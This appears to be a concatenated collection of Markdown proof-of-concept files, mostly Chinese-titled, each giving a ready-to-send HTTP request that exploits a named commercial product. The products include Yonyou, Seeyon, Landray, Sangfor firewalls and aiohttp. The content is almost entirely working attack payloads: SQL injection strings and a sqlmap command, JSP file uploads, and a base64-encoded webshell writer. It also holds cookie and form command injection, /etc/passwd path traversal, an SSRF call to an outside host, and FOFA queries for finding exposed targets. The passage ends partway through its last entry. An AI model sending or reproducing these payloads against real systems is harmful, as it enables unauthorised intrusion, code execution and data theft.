--------------------------------------------------------------------------------
/Quicklancer存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /listing?cat=6&filter=1&job-type=1&keywords=Mr.&location=1&order=desc&placeid=US&placetype=country&range1=1&range2=1&salary-type=1&sort=id&subcat= HTTP/1.1
3 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
4 | Host:
5 | Accept-Encoding: gzip, deflate
6 | Accept: */*
7 | Connection: keep-alive
8 |
9 |
10 | python3 sqlmap.py -r test.txt -p range2 --dbms=mysql --current-db --current-user --batch
11 | ```
12 |
13 |
--------------------------------------------------------------------------------
/万户-ezOFFICE-OA-officeserver.jsp文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /defaultroot/public/iWebOfficeSign/OfficeServer.jsp HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0
5 |
6 | DBSTEP V3.0 145 0 105 DBSTEP=REJTVEVQ
7 | OPTION=U0FWRUZJTEU=
8 | RECORDID=
9 | isDoc=dHJ1ZQ==
10 | moduleType=Z292ZG9jdW1lbnQ=
11 | FILETYPE=Ly8uLi8uLi9wdWJsaWMvZWRpdC83Yzc1QWYuanNw
12 | <% out.println("5EA635");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
13 | ```
14 |
15 |
--------------------------------------------------------------------------------
/广联达-Linkworks-GetAllData接口存在未授权访问.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /WebService/Lk6SyncService/MrMMSSvc/DataSvc.asmx/GetAllData HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; SM-P585Y) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36
5 | Content-Length: 32
6 | Accept: */*
7 | Accept-Encoding: gzip, deflate
8 | Connection: keep-alive
9 | Content-Type: application/x-www-form-urlencoded
10 |
11 | Token=!@#$asdf$#@!&DataType=user
12 | ```
13 |
14 |
--------------------------------------------------------------------------------
/用友NC Cloud queryStaffByName SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | fofa
2 |
3 | product="用友-NC-Cloud"
4 |
5 | ```
6 | GET /ncchr/pm/staff/queryStaffByName?name=1%27%20AND%201=DBMS_PIPE.RECEIVE_MESSAGE('a',5)--+ HTTP/1.1
7 | Host: x.x.x.x
8 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
9 | Accesstokenncc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
10 | Connection: close
11 | ```
12 |
13 |
--------------------------------------------------------------------------------
/联软安渡UniNXG安全数据交换系统poserver.zz存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI= HTTP/1.1
3 | Host: your-ip
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
5 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 | Connection: close
7 | ```
8 |
9 |
--------------------------------------------------------------------------------
/JeecgBoot积木报表存在SQL注入.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /jeecg-boot/jmreport/queryFieldBySql?previousPage=xxx&jmLink=YWFhfHxiYmI=&token=123123 HTTP/1.1
3 | User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)
4 | Accept: */*
5 | Accept-Language: zh-CN,zh;q=0.9
6 | Connection: keep-alive
7 | Content-Type: application/json
8 | Cache-Control: no-cache
9 | Pragma: no-cache
10 | Host: 192.168.131.100:8088
11 | Content-Length: 21
12 |
13 | {"sql":"select '1' "}
14 | ```
15 |
16 |
--------------------------------------------------------------------------------
/泛微e-cology9 存在SSRF漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /api/doc/mobile/fileview/getFileViewUrl HTTP/1.1
3 | Host: your-ip
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
5 | Accept-Encoding: gzip, deflate
6 | Accept-Language: zh-CN,zh;q=0.9
7 | Content-Type: application/json
8 | Upgrade-Insecure-Requests: 1
9 |
10 | {
11 | "file_id": "1000",
12 | "file_name": "c",
13 | "download_url":"http://euixlkewfg.dgrh3.cn"
14 | }
15 | ```
16 |
17 |
--------------------------------------------------------------------------------
/赛蓝企业管理系统 DownloadBuilder 任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | GET /BaseModule/ReportManage/DownloadBuilder?filename=/../web.config HTTP/1.1
4 | Host:
5 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0)Gecko/20100101 Firefox/125.0
6 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 | Accept-Encoding: gzip, deflate, br
9 | Connection: close
10 |
11 | ```
12 |
13 |
--------------------------------------------------------------------------------
/华磊科技物流getOrderTrackingNumber存在sql注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | GET /getOrderTrackingNumber.htm?documentCode=1'and%0a1=user::integer-- HTTP/1.1
4 | Host: your-ip
5 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
6 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 | Accept-Encoding: gzip, deflate, br
9 | Connection: close
10 | ```
11 |
12 |
--------------------------------------------------------------------------------
/致远constDef接囗存在代码执行漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /seeyon/constDefdo?method=newConstDef&constKey=asdasd&constDefine=$demo%20%22;new%20File(%22./webapps/ROOT/1111.jsp%22).write(new%20String(Base64.getDecoder0.decode%22PCUKaWYocmVxdWVzdC5nZXRQYXJhbWV0ZXlolmYiKSE9bnVsbCkobmV3lGphdmEuaW8uRmlsZU91dHB1dFN0cmVhbShhcHBsaWNhdGlvbi5nZXRSZWFSUGF0aCgiXFwiKStyZXF1ZXN0LmdldFBhcmFtZXRlcigiZilpKSkud3JpdGUocmVxdWVzdC5nZXRQYXJhbWV0ZXlolnQiKs5n
3 | ZXRCeXRIcygpKTSKJT4=%22));%22&constDescription=123&constType=4 HTTP/1.1
4 | Host: {{Hostname}}
5 | ```
6 |
7 |
--------------------------------------------------------------------------------
/aiohttp存在目录遍历漏洞(CVE-2024-23334).md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /static/../../../../../../etc/passwd HTTP/1.1
3 | Host: xxxxx
4 | Upgrade-Insecure-Requests: 1
5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
6 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
7 | Accept-Encoding: gzip, deflate
8 | Accept-Language: zh-CN,zh;q=0.9
9 | Connection: close
10 | ```
11 |
12 |
--------------------------------------------------------------------------------
/超级猫签名APP分发平台前台存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /user/install/downfile_ios?id=') UNION ALL SELECT NULL,NULL,CONCAT(IFNULL(CAST(CURRENT_USER() AS NCHAR),0x20)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - HTTP/1.1
3 | Cache-Control: no-cache
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
5 | Host: 127.0.0.1:81
6 | Accept: */*
7 | Accept-Encoding: gzip, deflate
8 | Connection: close
9 | ```
10 |
11 |
--------------------------------------------------------------------------------
/用友U8 Cloud MeasureQueryFrameAction SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | FOFA:
2 |
3 | ```
4 | title=="U8C"
5 | ```
6 |
7 | ```
8 | GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryFrameAction&method=doRefresh&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
9 | Host:
10 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
11 | Accept-Encoding: gzip, deflate
12 | Accept-Language: zh-CN,zh;q=0.9
13 | Connection: close
14 | ```
15 |
16 |
--------------------------------------------------------------------------------
/eking管理易FileUpload接口存在任意文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /app/FileUpload.ihtm?comm_type=EKING&file_name=../../rce.jsp. HTTP/1.1
3 | Host:
4 | User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
5 | Content-Type: multipart/form-data; boundary=WebKitFormBoundaryHHaZAYecVOf5sfa6
6 |
7 | --WebKitFormBoundaryHHaZAYecVOf5sfa6
8 | Content-Disposition: form-data; name="uplo_file"; filename="rce.jpg"
9 |
10 | <% out.println("hello");%>
11 | --WebKitFormBoundaryHHaZAYecVOf5sfa6--
12 | ```
13 |
14 |
--------------------------------------------------------------------------------
/全息AI网络运维平台存在命令执行漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /nmss/cloud/Ajax/ajax_cloud_router_config.php HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.1249.139 Safari/537.36
5 | Accept-Encoding: gzip, deflate
6 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
7 | Content-Type: application/x-www-form-urlencoded
8 | Content-Length: 34
9 |
10 | ping_cmd=8.8.8.8|echo test > 1.txt
11 | ```
12 |
13 |
--------------------------------------------------------------------------------
/深信服-下一代防火墙-RCE.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /cgi-bin/login.cgi HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
5 | Connection: close
6 | Content-Length: 112
7 | Content-Type: Application/X-www-Form
8 | Cookie: PHPSESSID=`$(echo 156828301~ > /fwlib/sys/virus/webui/svpn_html/qwer.txt)`;
9 | Accept-Encoding: gzip
10 |
11 | {\"opr\":\"login\", \"data\":{\"user\": \"watchTowr\" , \"pwd\": \"watchTowr\" , \"vericode\": \"EINW\" , \"privacy_enable\": \"0\"}}
12 | ```
13 |
14 |
--------------------------------------------------------------------------------
/致远互联FE协作办公平台apprvaddNew存在SQL注入.md:
--------------------------------------------------------------------------------
1 | fofa
2 |
3 | ```
4 | body="li_plugins_download"
5 | ```
6 |
7 | ```http
8 | POST /witapprovemanage/apprvaddNew.jsp HTTP/1.1
9 | Host:
10 | Cache-Control: max-age=0
11 | Upgrade-Insecure-Requests: 1
12 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
13 | Content-Type: application/x-www-form-urlencoded
14 | Content-Length: 95
15 |
16 | flowid=1' AND 1=DBMS_PIPE.RECEIVE_MESSAGE(CHR(79)||CHR(116)||CHR(104)||CHR(85),3) AND '1'='1
17 | ```
18 |
19 |
--------------------------------------------------------------------------------
/微信公众平台-无限回调系统-SQL注入.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /user/ajax.php?act=siteadd HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
5 | Content-Type: application/x-www-form-urlencoded
6 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
7 | Accept-Encoding: gzip, deflate
8 | Accept-Language: zh-CN,zh;q=0.9
9 | Connection: close
10 |
11 | siteUrl=';select sleep(5)#'
12 | ```
13 |
14 |
--------------------------------------------------------------------------------
/用友GRPA++Cloud 政府财务云 selectGlaDatasourcePreview SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | **fofa**
2 |
3 | ```
4 | body="/pf/portal/login/css/fonts/style.css"
5 | ```
6 |
7 |
8 |
9 | ```
10 | POST /gla/dataSource/selectGlaDatasourcePreview HTTP/1.1
11 | Host: x.x.x.x
12 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
13 | Content-Type: application/x-www-form-urlencoded
14 | Connection: close
15 | Content-Length: 74
16 |
17 | exe_sql=SELECT%20999*999&pageNumber=1&pageSize=10&exe_param=11,1,11,1,11,1
18 | ```
19 |
20 |
--------------------------------------------------------------------------------
/金和OA_HomeService.asmxSQL注入.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /c6/jhsoft.mobileapp/AndroidSevices/HomeService.asmx/GetHomeInfo?userID=1'%3b+WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
5 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 | Accept-Encoding: gzip, deflate
7 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
8 | Connection: close
9 | ```
10 |
11 |
--------------------------------------------------------------------------------
/瑞斯康达多业务智能网关RCE.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3Bunlink%28__FILE__%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Ftest.php%60 HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
5 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 | Accept-Encoding: gzip, deflate, br
8 | Connection: close
9 | ```
10 |
11 |
--------------------------------------------------------------------------------
/用友 UAP querygoodsgridbycode SQL 注入.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /ecp/productonsale/querygoodsgridbycode.json?code=1%27%29+AND+9976%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%289976%3D9976%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29--+dpxi HTTP/1.1
3 | Host:
4 | Accept-Encoding: gzip, deflate
5 | Upgrade-Insecure-Requests: 1
6 | Pragma: no-cache
7 | Accept-Language: zh-CN,zh;q=0.9
8 | ```
9 |
10 |
--------------------------------------------------------------------------------
/Array VPN任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /prx/000/http/localhost/client_sec/%00../../../addfolder HTTP/1.1
3 | Host: ip:port
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
5 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
6 | Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
7 | Accept-Encoding: gzip, deflate
8 | X_AN_FILESHARE: uname=t; password=t; sp_uname=t; flags=c3248;fshare_template=../../../../../../../../etc/passwd
9 | Dnt: 1
10 | Upgrade-Insecure-Requests: 1
11 | Connection: close
12 | ```
13 |
14 |
--------------------------------------------------------------------------------
/蓝凌 EKP 远程代码执行漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /ekp/sys/ui/sys_ui_component/sysUiComponent.do?method=replaceExtend&extendId=../../../../resource/help/km/review/&folderName=../../../ekp/sys/common HTTP/1.1
3 | Host:
4 | ```
5 |
6 | 利用 dataxml.jsp 执行任意代码
7 |
8 | ```
9 | POST /ekp/resource/help/km/review/dataxml.jsp HTTP/1.1
10 | Host:
11 | Content-Type: application/x-www-form-urlencoded
12 |
13 | s_bean=sysFormulaSimulateByJS&script=var x =
14 | Function/**/('return(java.lang.Runtime.getRuntime())')();x.exec("calc.exe");var a=mainOutput();function mainOutput() {};
15 | ```
16 |
17 |
--------------------------------------------------------------------------------
/蓝凌EIS智慧协同平台frm_button_func.aspx SQL注入.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /frm/frm_button_func.aspx?formid=1%20and%201=@@version--+ HTTP/1.1
3 | Host: xxxx
4 | Upgrade-Insecure-Requests: 1
5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
6 | like Gecko) Chrome/87.0.4280.88 Safari/537.36
7 | Accept:
8 | text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag
9 | e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
10 | Accept-Encoding: gzip, deflate
11 | Accept-Language: zh-CN,zh;q=0.9
12 | Connection: close
13 | ```
14 |
15 |
--------------------------------------------------------------------------------
/蓝凌EIS智慧协同平台frm_form_list_main.aspx SQL注入.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /frm/frm_form_list_main.aspx?list_id=1%20and%201=@@version--+ HTTP/1.1
3 | Host: x
4 | Upgrade-Insecure-Requests: 1
5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
6 | like Gecko) Chrome/87.0.4280.88 Safari/537.36
7 | Accept:
8 | text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag
9 | e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
10 | Accept-Encoding: gzip, deflate
11 | Accept-Language: zh-CN,zh;q=0.9
12 | Connection: close
13 | ```
14 |
15 |
--------------------------------------------------------------------------------
/瑞斯康达-多业务智能网关-RCE.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3Bunlink%28__FILE__%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Ftest.php%60 HTTP/1.1
4 | Host:
5 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
6 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 | Accept-Encoding: gzip, deflate, br
9 | Connection: close
10 | ```
11 |
12 |
--------------------------------------------------------------------------------
/万户ezOFFICE协同管理平台 getAutoCode SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /defaultroot/platform/custom/customizecenter/js/getAutoCode.jsp;.js?pageId=1&head=2%27+AND+6205%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2898%29%7C%7CCHR%2866%29%7C%7CCHR%2890%29%7C%7CCHR%28108%29%2C5%29--+YJdO&field=field_name&tabName=tfield HTTP/1.1
3 | Host:
4 | Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
5 | Accept-Encoding: gzip, deflate
6 | Accept-Language: zh-CN,zh;q=0.9
7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
8 | ```
9 |
10 |
--------------------------------------------------------------------------------
/深信服下一代防火墙NGAF存在任意文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /cgi-bin/login.cgi HTTP/1.1
3 | User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
4 | Accept-Encoding: gzip, deflate
5 | Accept: */*
6 | Connection: close
7 | Host: 127.0.0.1
8 | Content-Type: Application/X-www-Form
9 | Cookie: PHPSESSID=`$(echo 7258052001 > /fwlib/sys/virus/webui/svpn_html/502082888.txt)`;
10 | Content-Length: 111
11 |
12 | {"opr":"login", "data":{"user": "watchTowr" , "pwd": "watchTowr" , "vericode": "EINW" , "privacy_enable": "0"}}
13 | ```
14 |
15 |
--------------------------------------------------------------------------------
/蓝凌EIS智慧协同平台ShowUserInfo.aspx SQL注入.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /third/DingTalk/Demo/ShowUserInfo.aspx?account=1'%20and%201=@@version--+
3 | HTTP/1.1
4 | Host: x
5 | Upgrade-Insecure-Requests: 1
6 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
7 | like Gecko) Chrome/87.0.4280.88 Safari/537.36
8 | Accept:
9 | text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag
10 | e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
11 | Accept-Encoding: gzip, deflate
12 | Accept-Language: zh-CN,zh;q=0.9
13 | Connection: close
14 | ```
15 |
16 |
--------------------------------------------------------------------------------
/蓝凌EIS智慧协同平台fl_define_flow_chart_show.aspx SQL注入.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /flow/fl_define_flow_chart_show.aspx?id=1%20and%201=@@version--+ HTTP/1.1
3 | Host: x
4 | Upgrade-Insecure-Requests: 1
5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
6 | like Gecko) Chrome/87.0.4280.88 Safari/537.36
7 | Accept:
8 | text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag
9 | e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
10 | Accept-Encoding: gzip, deflate
11 | Accept-Language: zh-CN,zh;q=0.9
12 | Connection: close
13 | ```
14 |
15 |
--------------------------------------------------------------------------------
/蓝凌EIS智慧协同平台UniformEntry.aspx SQL注入.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /third/DingTalk/Pages/UniformEntry.aspx?moduleid=1%20and%201=@@version--+
3 | HTTP/1.1
4 | Host: xxxx
5 | Upgrade-Insecure-Requests: 1
6 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
7 | like Gecko) Chrome/87.0.4280.88 Safari/537.36
8 | Accept:
9 | text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag
10 | e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
11 | Accept-Encoding: gzip, deflate
12 | Accept-Language: zh-CN,zh;q=0.9
13 | Connection: close
14 | ```
15 |
16 |
--------------------------------------------------------------------------------
/金和OA_C6_UploadFileDownLoadnew存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /c6/JHSoft.Web.CustomQuery/UploadFileDownLoadnew.aspx/?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
3 | Host:
4 | Upgrade-Insecure-Requests: 1
5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
6 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 | Accept-Encoding: gzip, deflate, br
8 | Accept-Language: zh-CN,zh;q=0.9
9 | Connection: close
10 | ```
11 |
12 |
--------------------------------------------------------------------------------
/蓝凌EIS智慧协同平台doc_fileedit_word.aspx SQL注入.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--
3 | +&edittype=1,1 HTTP/1.1
4 | Host: xxxx
5 | Upgrade-Insecure-Requests: 1
6 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
7 | like Gecko) Chrome/87.0.4280.88 Safari/537.36
8 | Accept:
9 | text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag
10 | e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
11 | Accept-Encoding: gzip, deflate
12 | Accept-Language: zh-CN,zh;q=0.9
13 | Connection: close
14 | ```
15 |
16 |
--------------------------------------------------------------------------------
/科拓全智能停车视频收费系统CancelldList存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /KT_Admin/CarCard/DoubtCarNoListFrom.aspx HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
5 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 | Accept-Encoding: gzip, deflate
7 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
8 | Content-Type: application/x-www-form-urlencoded
9 | Connection: close
10 |
11 | start=0&limit=20&filer=1;SELECT SLEEP(5)#
12 | ```
13 |
14 |
--------------------------------------------------------------------------------
/金和OAC6-FileDownLoad.aspx任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
3 | Host: {{Hostname}}
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
5 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 | Accept-Encoding: gzip, deflate, br
7 | Accept-Language: zh-CN,zh;q=0.9
8 | Cache-Control: max-age=0
9 | Connection: close
10 | Upgrade-Insecure-Requests: 1
11 | ```
12 |
13 |
--------------------------------------------------------------------------------
/喰星云-数字化餐饮服务系统shelflife.php存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | GET /logistics/home_warning/php/shelflife.php?do=getList&lsid=(SELECT+(CASE+WHEN+(6193=6193)+THEN+''+ELSE+(SELECT+9641+UNION+SELECT+2384)+END)) HTTP/1.1
4 | Host:
5 | Upgrade-Insecure-Requests: 1
6 | Priority: u=0, i
7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
8 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
9 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
10 | Accept-Encoding: gzip, deflate
11 | ```
12 |
13 |
--------------------------------------------------------------------------------
/拓尔思TRS媒资管理系统任意文件上传.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | POST /mas/servlets/uploadThumb?appKey=sv&uploadingId=asd HTTP/1.1
4 | Accept: */*
5 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySl8siBbmVicABvTX
6 | Connection: close
7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
8 |
9 | ------WebKitFormBoundarySl8siBbmVicABvTX
10 | Content-Disposition: form-data; name="file";
11 | filename="%2e%2e%2fwebapps%2fmas%2fa%2etxt"
12 | Content-Type: application/octet-stream
13 |
14 | xxx
15 | ------WebKitFormBoundarySl8siBbmVicABvTX--
16 | ```
17 |
18 |
--------------------------------------------------------------------------------
/29网课交单平台epay.php存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /epay/epay.php HTTP/1.1
3 | Host: your-ip
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
